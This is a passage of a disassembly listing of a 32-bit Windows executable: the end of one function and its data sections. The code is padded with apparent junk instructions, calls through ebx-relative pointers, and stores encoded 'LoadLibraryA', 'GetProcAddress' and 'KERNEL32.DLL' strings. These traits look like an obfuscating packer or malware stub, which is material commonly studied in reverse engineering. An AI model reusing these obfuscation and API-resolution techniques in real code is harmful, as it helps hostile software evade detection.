mov [ebx+57Dh], eax
mov dh, 0BAh
mov edi, [ebx+75Bh]
add edi, 10h
or ch, 0DFh
mov eax, [edi]
add [ebx+57Dh], eax
mov eax, [ebx+57Dh]
mov [ebx+646h], eax
sub dl, 0CBh
pusha
sub esp, 10h
mov eax, [ebp+arg_C]
mov [esp+5Ch+var_5C], eax
or cl, 0Ch
xor dh, 0E8h
xor ch, 66h
mov eax, [ebp+arg_10]
mov [esp+5Ch+var_58], eax
add ch, 11h
and ch, 63h
xor ah, 5Eh
mov eax, [ebp+arg_14]
mov [esp+5Ch+var_54], eax
and dl, 1Ch
sub dl, 58h
mov eax, [ebp+arg_18]
mov [esp+5Ch+var_50], eax
call dword ptr [ebx+646h]
add esp, 10h
popa
mov [ebx+8], eax
locret_403F04: ; CODE XREF: sub_403CF9:loc_403D1A�j
; sub_403CF9:loc_403D42�j ...
leave
retn 1Ch
sub_403CF9 endp
seg000 ends
; Section 2. (virtual address 00004000)
; Virtual size : 00000061 ( 97.)
; Section size in file : 00000061 ( 97.)
; Offset to raw data for section: 00004000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
seg001 segment para public 'DATA' use32
assume cs:seg001
;org 404000h
dd 3 dup(0)
dd 4054h, 4037h, 5 dup(0)
dd 6F4C0000h, 694C6461h, 72617262h
db 79h, 41h, 0
dword_404037 dd 77E805D8h ; DATA XREF: start+14�r
dword_40403B dd 77E7A5FDh ; DATA XREF: start+1F�r
align 10h
dd 0
dd 74654700h, 636F7250h, 72646441h, 737365h, 4E52454Bh
dd 32334C45h, 4C4C442Eh
db 0
seg001 ends
; Section 3. (virtual address 00005000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00004200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 405000h
align 2000h
_idata2 ends
end start